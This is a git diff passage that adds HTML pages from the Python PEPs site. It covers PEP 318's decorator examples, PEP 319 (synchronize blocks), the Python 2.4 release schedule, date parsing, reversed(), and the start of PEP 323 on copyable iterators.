  7. Enforce function argument and return types. Note that this +copies the func_name attribute from the old to the new function. +func_name was made writable in Python 2.4a3:
    def accepts(*types):
    +    def check_accepts(f):
    +        assert len(types) == f.func_code.co_argcount
    +        def new_f(*args, **kwds):
    +            for (a, t) in zip(args, types):
    +                assert isinstance(a, t), \
    +                       "arg %r does not match %s" % (a,t)
    +            return f(*args, **kwds)
    +        new_f.func_name = f.func_name
    +        return new_f
    +    return check_accepts
    +
    +def returns(rtype):
    +    def check_returns(f):
    +        def new_f(*args, **kwds):
    +            result = f(*args, **kwds)
    +            assert isinstance(result, rtype), \
    +                   "return value %r does not match %s" % (result,rtype)
    +            return result
    +        new_f.func_name = f.func_name
    +        return new_f
    +    return check_returns
    +
    +@accepts(int, (int,float))
    +@returns((int,float))
    +def func(arg1, arg2):
    +    return arg1 * arg2
    +
    +
    +
  8. +
  9. Declare that a class implements a particular (set of) interface(s). +This is from a posting by Bob Ippolito on python-dev based on +experience with PyProtocols.
    def provides(*interfaces):
    +     """
    +     An actual, working, implementation of provides for
    +     the current implementation of PyProtocols.  Not
    +     particularly important for the PEP text.
    +     """
    +     def provides(typ):
    +         declareImplementation(typ, instancesProvide=interfaces)
    +         return typ
    +     return provides
    +
    +class IBar(Interface):
    +     """Declare something about IBar here"""
    +
    +@provides(IBar)
    +class Foo(object):
    +        """Implement something here..."""
    +
    +
    +
  10. +
+

Of course, all these examples are possible today, though without +syntactic support.

+
+
+

(No longer) Open Issues

+
    +
  1. It’s not yet certain that class decorators will be incorporated +into the language at a future point. Guido expressed skepticism about +the concept, but various people have made some strong arguments +(search for PEP 318 -- posting draft) on their behalf in +python-dev. It’s exceedingly unlikely that class decorators +will be in Python 2.4.

    PEP 3129 proposes to add class decorators as of Python 2.6.

    +
  2. +
  3. The choice of the @ character will be re-examined before +Python 2.4b1.

    In the end, the @ character was kept.

    +
  4. +
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0318.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0319/index.html b/pep-0319/index.html new file mode 100644 index 00000000000..d79edad2fe9 --- /dev/null +++ b/pep-0319/index.html @@ -0,0 +1,602 @@ + + + + + + + + PEP 319 – Python Synchronize/Asynchronize Block | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 319 – Python Synchronize/Asynchronize Block

+
+
Author:
+
Michel Pelletier <michel at users.sourceforge.net>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
24-Feb-2003
+
Python-Version:
+
2.4
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes adding two new keywords to Python, ‘synchronize’ +and ‘asynchronize’.

+
+
+

Pronouncement

+

This PEP is rejected in favor of PEP 343.

+
+
The ‘synchronize’ Keyword
The concept of code synchronization in Python is too low-level. +To synchronize code a programmer must be aware of the details of +the following pseudo-code pattern:
initialize_lock()
+
+...
+
+acquire_lock()
+try:
+    change_shared_data()
+finally:
+    release_lock()
+
+
+

This synchronized block pattern is not the only pattern (more +discussed below) but it is very common. This PEP proposes +replacing the above code with the following equivalent:

+
synchronize:
+    change_shared_data()
+
+
+

The advantages of this scheme are simpler syntax and less room for +user error. Currently users are required to write code about +acquiring and releasing thread locks in ‘try/finally’ blocks; +errors in this code can cause notoriously difficult concurrent +thread locking issues.

+
+
The ‘asynchronize’ Keyword
While executing a ‘synchronize’ block of code a programmer may +want to “drop back” to running asynchronously momentarily to run +blocking input/output routines or something else that might take an +indeterminate amount of time and does not require synchronization. +This code usually follows the pattern:
initialize_lock()
+
+...
+
+acquire_lock()
+try:
+    change_shared_data()
+    release_lock()             # become async
+    do_blocking_io()
+    acquire_lock()             # sync again
+    change_shared_data2()
+
+finally:
+    release_lock()
+
+
+

The asynchronous section of the code is not very obvious visually, +so it is marked up with comments. Using the proposed +‘asynchronize’ keyword this code becomes much cleaner, easier to +understand, and less prone to error:

+
synchronize:
+    change_shared_data()
+
+    asynchronize:
+       do_blocking_io()
+
+    change_shared_data2()
+
+
+

Encountering an ‘asynchronize’ keyword inside a non-synchronized +block can raise either an error or issue a warning (as all code +blocks are implicitly asynchronous anyway). It is important to +note that the above example is not the same as:

+
synchronize:
+    change_shared_data()
+
+do_blocking_io()
+
+synchronize:
+    change_shared_data2()
+
+
+

Because both synchronized blocks of code may be running inside the +same iteration of a loop, Consider:

+
while in_main_loop():
+    synchronize:
+        change_shared_data()
+
+        asynchronize:
+           do_blocking_io()
+
+        change_shared_data2()
+
+
+

Many threads may be looping through this code. Without the +‘asynchronize’ keyword one thread cannot stay in the loop and +release the lock at the same time while blocking IO is going on. +This pattern of releasing locks inside a main loop to do blocking +IO is used extensively inside the CPython interpreter itself.

+
+
+
+
+

Synchronization Targets

+

As proposed the ‘synchronize’ and ‘asynchronize’ keywords +synchronize a block of code. However programmers may want to +specify a target object that threads synchronize on. Any object +can be a synchronization target.

+

Consider a two-way queue object: two different objects are used by +the same ‘synchronize’ code block to synchronize both queues +separately in the ‘get’ method:

+
class TwoWayQueue:
+    def __init__(self):
+        self.front = []
+        self.rear = []
+
+    def putFront(self, item):
+        self.put(item, self.front)
+
+    def getFront(self):
+        item = self.get(self.front)
+        return item
+
+    def putRear(self, item):
+        self.put(item, self.rear)
+
+    def getRear(self):
+        item = self.get(self.rear)
+        return item
+
+    def put(self, item, queue):
+        synchronize queue:
+            queue.append(item)
+
+    def get(self, queue):
+        synchronize queue:
+            item = queue[0]
+            del queue[0]
+            return item
+
+
+

Here is the equivalent code in Python as it is now without a +‘synchronize’ keyword:

+
import thread
+
+class LockableQueue:
+
+    def __init__(self):
+        self.queue = []
+        self.lock = thread.allocate_lock()
+
+class TwoWayQueue:
+    def __init__(self):
+        self.front = LockableQueue()
+        self.rear = LockableQueue()
+
+    def putFront(self, item):
+        self.put(item, self.front)
+
+    def getFront(self):
+        item = self.get(self.front)
+        return item
+
+    def putRear(self, item):
+        self.put(item, self.rear)
+
+    def getRear(self):
+        item = self.get(self.rear)
+        return item
+
+    def put(self, item, queue):
+        queue.lock.acquire()
+        try:
+            queue.append(item)
+        finally:
+            queue.lock.release()
+
+    def get(self, queue):
+        queue.lock.acquire()
+        try:
+            item = queue[0]
+            del queue[0]
+            return item
+        finally:
+            queue.lock.release()
+
+
+

The last example had to define an extra class to associate a lock +with the queue where the first example the ‘synchronize’ keyword +does this association internally and transparently.

+
+
+

Other Patterns that Synchronize

+

There are some situations where the ‘synchronize’ and +‘asynchronize’ keywords cannot entirely replace the use of lock +methods like acquire and release. Some examples are if the +programmer wants to provide arguments for acquire or if a lock +is acquired in one code block but released in another, as shown +below.

+

Here is a class from Zope modified to use both the ‘synchronize’ +and ‘asynchronize’ keywords and also uses a pool of explicit locks +that are acquired and released in different code blocks and thus +don’t use ‘synchronize’:

+
import thread
+from ZServerPublisher import ZServerPublisher
+
+class ZRendevous:
+
+    def __init__(self, n=1):
+        pool=[]
+        self._lists=pool, [], []
+
+        synchronize:
+            while n > 0:
+                l=thread.allocate_lock()
+                l.acquire()
+                pool.append(l)
+                thread.start_new_thread(ZServerPublisher,
+                                        (self.accept,))
+                n=n-1
+
+    def accept(self):
+        synchronize:
+            pool, requests, ready = self._lists
+            while not requests:
+                l=pool[-1]
+                del pool[-1]
+                ready.append(l)
+
+                asynchronize:
+                    l.acquire()
+
+                pool.append(l)
+
+            r=requests[0]
+            del requests[0]
+            return r
+
+    def handle(self, name, request, response):
+        synchronize:
+            pool, requests, ready = self._lists
+            requests.append((name, request, response))
+            if ready:
+                l=ready[-1]
+                del ready[-1]
+                l.release()
+
+
+

Here is the original class as found in the +‘Zope/ZServer/PubCore/ZRendevous.py’ module. The “convenience” of +the ‘_a’ and ‘_r’ shortcut names obscure the code:

+
import thread
+from ZServerPublisher import ZServerPublisher
+
+class ZRendevous:
+
+    def __init__(self, n=1):
+        sync=thread.allocate_lock()
+        self._a=sync.acquire
+        self._r=sync.release
+        pool=[]
+        self._lists=pool, [], []
+        self._a()
+        try:
+            while n > 0:
+                l=thread.allocate_lock()
+                l.acquire()
+                pool.append(l)
+                thread.start_new_thread(ZServerPublisher,
+                                        (self.accept,))
+                n=n-1
+        finally: self._r()
+
+    def accept(self):
+        self._a()
+        try:
+            pool, requests, ready = self._lists
+            while not requests:
+                l=pool[-1]
+                del pool[-1]
+                ready.append(l)
+                self._r()
+                l.acquire()
+                self._a()
+                pool.append(l)
+
+            r=requests[0]
+            del requests[0]
+            return r
+        finally: self._r()
+
+    def handle(self, name, request, response):
+        self._a()
+        try:
+            pool, requests, ready = self._lists
+            requests.append((name, request, response))
+            if ready:
+                l=ready[-1]
+                del ready[-1]
+                l.release()
+        finally: self._r()
+
+
+

In particular the asynchronize section of the accept method is +not very obvious. To beginner programmers, ‘synchronize’ and +‘asynchronize’ remove many of the problems encountered when +juggling multiple acquire and release methods on different +locks in different try/finally blocks.

+
+
+

Formal Syntax

+

Python syntax is defined in a modified BNF grammar notation +described in the Python Language Reference [1]. This section +describes the proposed synchronization syntax using this grammar:

+
synchronize_stmt: 'synchronize' [test] ':' suite
+asynchronize_stmt: 'asynchronize' [test] ':' suite
+compound_stmt: ... | synchronized_stmt | asynchronize_stmt
+
+
+

(The ‘…’ indicates other compound statements elided).

+
+
+

Proposed Implementation

+

The author of this PEP has not explored an implementation yet. +There are several implementation issues that must be resolved. +The main implementation issue is what exactly gets locked and +unlocked during a synchronized block.

+

During an unqualified synchronized block (the use of the +‘synchronize’ keyword without a target argument) a lock could be +created and associated with the synchronized code block object. +Any threads that are to execute the block must first acquire the +code block lock.

+

When an ‘asynchronize’ keyword is encountered in a ‘synchronize’ +block the code block lock is unlocked before the inner block is +executed and re-locked when the inner block terminates.

+

When a synchronized block target is specified the object is +associated with a lock. How this is implemented cleanly is +probably the highest risk of this proposal. Java Virtual Machines +typically associate a special hidden lock object with target +object and use it to synchronized the block around the target +only.

+
+
+

Backward Compatibility

+

Backward compatibility is solved with the new from __future__ +Python syntax (PEP 236), and the new warning framework (PEP 230) +to evolve the +Python language into phasing out any conflicting names that use +the new keywords ‘synchronize’ and ‘asynchronize’. To use the +syntax now, a developer could use the statement:

+
from __future__ import threadsync  # or whatever
+
+
+

In addition, any code that uses the keyword ‘synchronize’ or +‘asynchronize’ as an identifier will be issued a warning from +Python. After the appropriate period of time, the syntax would +become standard, the above import statement would do nothing, and +any identifiers named ‘synchronize’ or ‘asynchronize’ would raise +an exception.

+
+
+

PEP 310 Reliable Acquisition/Release Pairs

+

PEP 310 proposes the ‘with’ keyword that can serve the same +function as ‘synchronize’ (but no facility for ‘asynchronize’). +The pattern:

+
initialize_lock()
+
+with the_lock:
+    change_shared_data()
+
+
+

is equivalent to the proposed:

+
synchronize the_lock:
+    change_shared_data()
+
+
+

PEP 310 must synchronize on an existing lock, while this PEP +proposes that unqualified ‘synchronize’ statements synchronize on +a global, internal, transparent lock in addition to qualified +‘synchronize’ statements. The ‘with’ statement also requires lock +initialization, while the ‘synchronize’ statement can synchronize +on any target object including locks.

+

While limited in this fashion, the ‘with’ statement is more +abstract and serves more purposes than synchronization. For +example, transactions could be used with the ‘with’ keyword:

+
initialize_transaction()
+
+with my_transaction:
+    do_in_transaction()
+
+# when the block terminates, the transaction is committed.
+
+
+

The ‘synchronize’ and ‘asynchronize’ keywords cannot serve this or +any other general acquire/release pattern other than thread +synchronization.

+
+
+

How Java Does It

+

Java defines a ‘synchronized’ keyword (note the grammatical tense +different between the Java keyword and this PEP’s ‘synchronize’) +which must be qualified on any object. The syntax is:

+
synchronized (Expression) Block
+
+
+

Expression must yield a valid object (null raises an error and +exceptions during ‘Expression’ terminate the ‘synchronized’ block +for the same reason) upon which ‘Block’ is synchronized.

+
+
+

How Jython Does It

+

Jython uses a ‘synchronize’ class with the static method +‘make_synchronized’ that accepts one callable argument and returns +a newly created, synchronized, callable “wrapper” around the +argument.

+
+
+

Summary of Proposed Changes to Python

+

Adding new ‘synchronize’ and ‘asynchronize’ keywords to the +language.

+
+
+

Risks

+

This PEP proposes adding two keywords to the Python language. This +may break code.

+

There is no implementation to test.

+

It’s not the most important problem facing Python programmers +today (although it is a fairly notorious one).

+

The equivalent Java keyword is the past participle ‘synchronized’. +This PEP proposes the present tense, ‘synchronize’ as being more +in spirit with Python (there being less distinction between +compile-time and run-time in Python than Java).

+
+
+

Dissenting Opinion

+

This PEP has not been discussed on python-dev.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0319.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0320/index.html b/pep-0320/index.html new file mode 100644 index 00000000000..1ba266093cb --- /dev/null +++ b/pep-0320/index.html @@ -0,0 +1,327 @@ + + + + + + + + PEP 320 – Python 2.4 Release Schedule | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 320 – Python 2.4 Release Schedule

+
+
Author:
+
Barry Warsaw, Raymond Hettinger, Anthony Baxter
+
Status:
+
Final
+
Type:
+
Informational
+
Topic:
+
Release
+
Created:
+
29-Jul-2003
+
Python-Version:
+
2.4
+
Post-History:
+
01-Dec-2004
+
+
+
+
Table of Contents +
+
+

Abstract

+

This document describes the development and release schedule for +Python 2.4. The schedule primarily concerns itself with PEP-sized +items. Small features may be added up to and including the first +beta release. Bugs may be fixed until the final release.

+

There will be at least two alpha releases, two beta releases, and +one release candidate. The release date was 30th November, 2004.

+
+
+

Release Manager

+

Anthony Baxter

+

Martin von Lowis is building the Windows installers, Fred the +doc packages, Sean the RPMs.

+
+
+

Release Schedule

+
    +
  • July 9: alpha 1 [completed]
  • +
  • August 5/6: alpha 2 [completed]
  • +
  • Sept 3: alpha 3 [completed]
  • +
  • October 15: beta 1 [completed]
  • +
  • November 3: beta 2 [completed]
  • +
  • November 18: release candidate 1 [completed]
  • +
  • November 30: final [completed]
  • +
+
+
+

Completed features for 2.4

+
    +
  • PEP 218 Builtin Set Objects.
  • +
  • PEP 289 Generator expressions.
  • +
  • PEP 292 Simpler String Substitutions to be implemented as a module.
  • +
  • PEP 318: Function/method decorator syntax, using @syntax
  • +
  • PEP 322 Reverse Iteration.
  • +
  • PEP 327: A Decimal package for fixed precision arithmetic.
  • +
  • PEP 328: Multi-line Imports
  • +
  • Encapsulate the decorate-sort-undecorate pattern in a keyword for +list.sort().
  • +
  • Added a builtin called sorted() which may be used in expressions.
  • +
  • The itertools module has two new functions, tee() and groupby().
  • +
  • Add a collections module with a deque() object.
  • +
  • Add two statistical/reduction functions, nlargest() and nsmallest() +to the heapq module.
  • +
  • Python’s windows installer now uses MSI
  • +
+
+
+

Deferred until 2.5

+
    +
  • Deprecate and/or remove the modules listed in PEP 4 (posixfile, +gopherlib, pre, others)
  • +
  • Remove support for platforms as described in PEP 11.
  • +
  • Finish implementing the Distutils bdist_dpkg command. (AMK)
  • +
  • Add support for reading shadow passwords [1]
  • +
  • It would be nice if the built-in SSL socket type could be used +for non-blocking SSL I/O. Currently packages such as Twisted +which implement async servers using SSL have to require third-party +packages such as pyopenssl.
  • +
  • AST-based compiler: this branch was not completed in time for +2.4, but will land on the trunk some time after 2.4 final is +out, for inclusion in 2.5.
  • +
  • reST is going to be used a lot in Zope3. Maybe it could become +a standard library module? (Since reST’s author thinks it’s too +instable, I’m inclined not to do this.)
  • +
+
+
+

Ongoing tasks

+

The following are ongoing TO-DO items which we should attempt to +work on without hoping for completion by any particular date.

+
    +
  • Documentation: complete the distribution and installation +manuals.
  • +
  • Documentation: complete the documentation for new-style +classes.
  • +
  • Look over the Demos/ directory and update where required (Andrew +Kuchling has done a lot of this)
  • +
  • New tests.
  • +
  • Fix doc bugs on SF.
  • +
  • Remove use of deprecated features in the core.
  • +
  • Document deprecated features appropriately.
  • +
  • Mark deprecated C APIs with Py_DEPRECATED.
  • +
  • Deprecate modules which are unmaintained, or perhaps make a new +category for modules ‘Unmaintained’
  • +
  • In general, lots of cleanup so it is easier to move forward.
  • +
+
+
+

Open issues

+

None at this time.

+
+
+

Carryover features from Python 2.3

+
    +
  • The import lock could use some redesign. [2]
  • +
  • A nicer API to open text files, replacing the ugly (in some +people’s eyes) “U” mode flag. There’s a proposal out there to +have a new built-in type textfile(filename, mode, encoding). +(Shouldn’t it have a bufsize argument too?)
  • +
  • New widgets for Tkinter???

    Has anyone gotten the time for this? Are there any new +widgets in Tk 8.4? Note that we’ve got better Tix support +already (though not on Windows yet).

    +
  • +
  • PEP 304 (Controlling Generation of Bytecode Files by Montanaro) +seems to have lost steam.
  • +
  • For a class defined inside another class, the __name__ should be +“outer.inner”, and pickling should work. ([3]. I’m no +longer certain this is easy or even right.)
  • +
  • Decide on a clearer deprecation policy (especially for modules) +and act on it. For a start, see this message from Neal Norwitz [4]. +There seems insufficient interest in moving this further in an +organized fashion, and it’s not particularly important.
  • +
  • Provide alternatives for common uses of the types module; +Skip Montanaro has posted a proto-PEP for this idea [5]. +There hasn’t been any progress on this, AFAICT.
  • +
  • Use pending deprecation for the types and string modules. This +requires providing alternatives for the parts that aren’t +covered yet (e.g. string.whitespace and types.TracebackType). +It seems we can’t get consensus on this.
  • +
  • PEP 262 Database of Installed Python Packages (Kuchling)

    This turns out to be useful for Jack Jansen’s Python installer, +so the database is worth implementing. Code will go in +sandbox/pep262.

    +
  • +
  • PEP 269 Pgen Module for Python (Riehl)

    (Some necessary changes are in; the pgen module itself needs to +mature more.)

    +
  • +
  • PEP 266 Optimizing Global Variable/Attribute Access (Montanaro)

    PEP 267 Optimized Access to Module Namespaces (Hylton)

    +

    PEP 280 Optimizing access to globals (van Rossum)

    +

    These are basically three friendly competing proposals. Jeremy +has made a little progress with a new compiler, but it’s going +slowly and the compiler is only the first step. Maybe we’ll be +able to refactor the compiler in this release. I’m tempted to +say we won’t hold our breath.

    +
  • +
  • Lazily tracking tuples? [6] [7] +Not much enthusiasm I believe.
  • +
  • PEP 286 Enhanced Argument Tuples (von Loewis)

    I haven’t had the time to review this thoroughly. It seems a +deep optimization hack (also makes better correctness guarantees +though).

    +
  • +
  • Make ‘as’ a keyword. It has been a pseudo-keyword long enough. +Too much effort to bother.
  • +
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0320.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0321/index.html b/pep-0321/index.html new file mode 100644 index 00000000000..822fc70cc08 --- /dev/null +++ b/pep-0321/index.html @@ -0,0 +1,239 @@ + + + + + + + + PEP 321 – Date/Time Parsing and Formatting | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 321 – Date/Time Parsing and Formatting

+
+
Author:
+
A.M. Kuchling <amk at amk.ca>
+
Status:
+
Withdrawn
+
Type:
+
Standards Track
+
Created:
+
16-Sep-2003
+
Python-Version:
+
2.4
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

Python 2.3 added a number of simple date and time types in the +datetime module. There’s no support for parsing strings in various +formats and returning a corresponding instance of one of the types. +This PEP proposes adding a family of predefined parsing function for +several commonly used date and time formats, and a facility for generic +parsing.

+

The types provided by the datetime module all have +.isoformat() and .ctime() methods that return string +representations of a time, and the .strftime() method can be used +to construct new formats. There are a number of additional +commonly-used formats that would be useful to have as part of the +standard library; this PEP also suggests how to add them.

+
+
+

Input Formats

+

Useful formats to support include:

+
    +
  • ISO8601
  • +
  • ARPA/RFC 2822
  • +
  • ctime
  • +
  • Formats commonly written by humans such as the American +“MM/DD/YYYY”, the European “YYYY/MM/DD”, and variants such as +“DD-Month-YYYY”.
  • +
  • CVS-style or tar-style dates (“tomorrow”, “12 hours ago”, etc.)
  • +
+

XXX The Perl ParseDate.pm module supports many different input formats, +both absolute and relative. Should we try to support them all?

+

Options:

+
    +
  1. Add functions to the datetime module:
    import datetime
    +d = datetime.parse_iso8601("2003-09-15T10:34:54")
    +
    +
    +
  2. +
  3. Add class methods to the various types. There are already various +class methods such as .now(), so this would be pretty natural.:
    import datetime
    +d = datetime.date.parse_iso8601("2003-09-15T10:34:54")
    +
    +
    +
  4. +
  5. Add a separate module (possible names: date, date_parse, parse_date) +or subpackage (possible names: datetime.parser) containing parsing +functions:
    import datetime
    +d = datetime.parser.parse_iso8601("2003-09-15T10:34:54")
    +
    +
    +
  6. +
+

Unresolved questions:

+
    +
  • Naming convention to use.
  • +
  • What exception to raise on errors? ValueError, or a specialized exception?
  • +
  • Should you know what type you’re expecting, or should the parsing figure +it out? (e.g. parse_iso8601("yyyy-mm-dd") returns a date instance, +but parsing “yyyy-mm-ddThh:mm:ss” returns a datetime.) Should +there be an option to signal an error if a time is provided where +none is expected, or if no time is provided?
  • +
  • Anything special required for I18N? For time zones?
  • +
+
+
+

Generic Input Parsing

+

Is a strptime() implementation that returns datetime types sufficient?

+

XXX if yes, describe strptime here. Can the existing pure-Python +implementation be easily retargeted?

+
+
+

Output Formats

+

Not all input formats need to be supported as output formats, because it’s +pretty trivial to get the strftime() argument right for simple things +such as YYYY/MM/DD. Only complicated formats need to be supported; RFC 2822 +is currently the only one I can think of.

+

Options:

+
    +
  1. Provide predefined format strings, so you could write this:
    import datetime
    +d = datetime.datetime(...)
    +print d.strftime(d.RFC2822_FORMAT) # or datetime.RFC2822_FORMAT?
    +
    +
    +
  2. +
  3. Provide new methods on all the objects:
    d = datetime.datetime(...)
    +print d.rfc822_time()
    +
    +
    +
  4. +
+

Relevant functionality in other languages includes the PHP date +function (Python implementation by Simon Willison at +http://simon.incutio.com/archive/2003/10/07/dateInPython)

+
+
+

References

+

Other useful links:

+

http://www.egenix.com/files/python/mxDateTime.html +http://ringmaster.arc.nasa.gov/tools/time_formats.html +http://www.thinkage.ca/english/gcos/expl/b/lib/0tosec.html +https://moin.conectiva.com.br/DateUtil

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0321.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0322/index.html b/pep-0322/index.html new file mode 100644 index 00000000000..2f8c35a098a --- /dev/null +++ b/pep-0322/index.html @@ -0,0 +1,292 @@ + + + + + + + + PEP 322 – Reverse Iteration | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 322 – Reverse Iteration

+
+
Author:
+
Raymond Hettinger <python at rcn.com>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
24-Sep-2003
+
Python-Version:
+
2.4
+
Post-History:
+
24-Sep-2003
+
+
+
+
Table of Contents +
+
+

Abstract

+

This proposal is to add a builtin function to support reverse +iteration over sequences.

+
+
+

Motivation

+

For indexable objects, current approaches for reverse iteration are +error prone, unnatural, and not especially readable:

+
for i in xrange(n-1, -1, -1):
+    print seqn[i]
+
+
+

One other current approach involves reversing a list before iterating +over it. That technique wastes computer cycles, memory, and lines of +code:

+
rseqn = list(seqn)
+rseqn.reverse()
+for value in rseqn:
+    print value
+
+
+

Extended slicing is a third approach that minimizes the code overhead +but does nothing for memory efficiency, beauty, or clarity.

+

Reverse iteration is much less common than forward iteration, but it +does arise regularly in practice. See Real World Use Cases below.

+
+
+

Proposal

+

Add a builtin function called reversed() that makes a reverse +iterator over sequence objects that support __getitem__() and +__len__().

+

The above examples then simplify to:

+
for i in reversed(xrange(n)):
+    print seqn[i]
+
+
+
for elem in reversed(seqn):
+    print elem
+
+
+

The core idea is that the clearest, least error-prone way of specifying +reverse iteration is to specify it in a forward direction and then say +reversed.

+

The implementation could be as simple as:

+
def reversed(x):
+    if hasattr(x, 'keys'):
+        raise ValueError("mappings do not support reverse iteration")
+    i = len(x)
+    while i > 0:
+        i -= 1
+        yield x[i]
+
+
+

No language syntax changes are needed. The proposal is fully backwards +compatible.

+

A C implementation and unit tests are at: https://bugs.python.org/issue834422

+
+
+

BDFL Pronouncement

+

This PEP has been conditionally accepted for Py2.4. The condition means +that if the function is found to be useless, it can be removed before +Py2.4b1.

+
+
+

Alternative Method Names

+
    +
  • reviter – Jeremy Fincher’s suggestion matches use of iter()
  • +
  • ireverse – uses the itertools naming convention
  • +
  • inreverse – no one seems to like this one except me
  • +
+

The name reverse is not a candidate because it duplicates the name +of the list.reverse() which mutates the underlying list.

+
+
+

Discussion

+

The case against adoption of the PEP is a desire to keep the number of +builtin functions small. This needs to weighed against the simplicity +and convenience of having it as builtin instead of being tucked away in +some other namespace.

+
+
+

Real World Use Cases

+

Here are some instances of reverse iteration taken from the standard +library and comments on why reverse iteration was necessary:

+
    +
  • atexit.exit_handlers() uses:
    while _exithandlers:
    +    func, targs, kargs = _exithandlers.pop()
    +        . . .
    +
    +
    +

    In this application popping is required, so the new function would +not help.

    +
  • +
  • heapq.heapify() uses for i in xrange(n//2 - 1, -1, -1) because +higher-level orderings are more easily formed from pairs of +lower-level orderings. A forward version of this algorithm is +possible; however, that would complicate the rest of the heap code +which iterates over the underlying list in the opposite direction. +The replacement code for i in reversed(xrange(n//2)) makes +clear the range covered and how many iterations it takes.
  • +
  • mhlib.test() uses:
    testfolders.reverse();
    +for t in testfolders:
    +    do('mh.deletefolder(%s)' % `t`)
    +
    +
    +

    The need for reverse iteration arises because the tail of the +underlying list is altered during iteration.

    +
  • +
  • platform._dist_try_harder() uses +for n in range(len(verfiles)-1,-1,-1) because the loop deletes +selected elements from verfiles but needs to leave the rest of +the list intact for further iteration.
  • +
  • random.shuffle() uses for i in xrange(len(x)-1, 0, -1) because +the algorithm is most easily understood as randomly selecting +elements from an ever diminishing pool. In fact, the algorithm can +be run in a forward direction but is less intuitive and rarely +presented that way in literature. The replacement code +for i in reversed(xrange(1, len(x))) is much easier +to verify visually.
  • +
  • rfc822.Message.__delitem__() uses:
    list.reverse()
    +for i in list:
    +    del self.headers[i]
    +
    +
    +

    The need for reverse iteration arises because the tail of the +underlying list is altered during iteration.

    +
  • +
+
+
+

Rejected Alternatives

+

Several variants were submitted that attempted to apply reversed() +to all iterables by running the iterable to completion, saving the +results, and then returning a reverse iterator over the results. +While satisfying some notions of full generality, running the input +to the end is contrary to the purpose of using iterators +in the first place. Also, a small disaster ensues if the underlying +iterator is infinite.

+

Putting the function in another module or attaching it to a type object +is not being considered. Like its cousins, zip() and enumerate(), +the function needs to be directly accessible in daily programming. Each +solves a basic looping problem: lock-step iteration, loop counting, and +reverse iteration. Requiring some form of dotted access would interfere +with their simplicity, daily utility, and accessibility. They are core +looping constructs, independent of any one application domain.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0322.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0323/index.html b/pep-0323/index.html new file mode 100644 index 00000000000..dfdaf9a29bc --- /dev/null +++ b/pep-0323/index.html @@ -0,0 +1,571 @@ + + + + + + + + PEP 323 – Copyable Iterators | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 323 – Copyable Iterators

+
+
Author:
+
Alex Martelli <aleaxit at gmail.com>
+
Status:
+
Deferred
+
Type:
+
Standards Track
+
Created:
+
25-Oct-2003
+
Python-Version:
+
2.5
+
Post-History:
+
29-Oct-2003
+
+
+
+
Table of Contents +
+
+

Deferral

+

This PEP has been deferred. Copyable iterators are a nice idea, but after +four years, no implementation or widespread interest has emerged.

+
+
+

Abstract

+

This PEP suggests that some iterator types should support shallow +copies of their instances by exposing a __copy__ method which meets +some specific requirements, and indicates how code using an iterator +might exploit such a __copy__ method when present.

+
+
+

Update and Comments

+

Support for __copy__ was included in Py2.4’s itertools.tee().

+

Adding __copy__ methods to existing iterators will change the +behavior under tee(). Currently, the copied iterators remain +tied to the original iterator. If the original advances, then +so do all of the copies. Good practice is to overwrite the +original so that anomalies don’t result: a,b=tee(a). +Code that doesn’t follow that practice may observe a semantic +change if a __copy__ method is added to an iterator.

+
+
+

Motivation

+

In Python up to 2.3, most built-in iterator types don’t let the user +copy their instances. User-coded iterators that do let their clients +call copy.copy on their instances may, or may not, happen to return, +as a result of the copy, a separate iterator object that may be +iterated upon independently from the original.

+

Currently, “support” for copy.copy in a user-coded iterator type is +almost invariably “accidental” – i.e., the standard machinery of the +copy method in Python’s standard library’s copy module does build and +return a copy. However, the copy will be independently iterable with +respect to the original only if calling .next() on an instance of that +class happens to change instance state solely by rebinding some +attributes to new values, and not by mutating some attributes’ +existing values.

+

For example, an iterator whose “index” state is held as an integer +attribute will probably give usable copies, since (integers being +immutable) .next() presumably just rebinds that attribute. On the +other hand, another iterator whose “index” state is held as a list +attribute will probably mutate the same list object when .next() +executes, and therefore copies of such an iterator will not be +iterable separately and independently from the original.

+

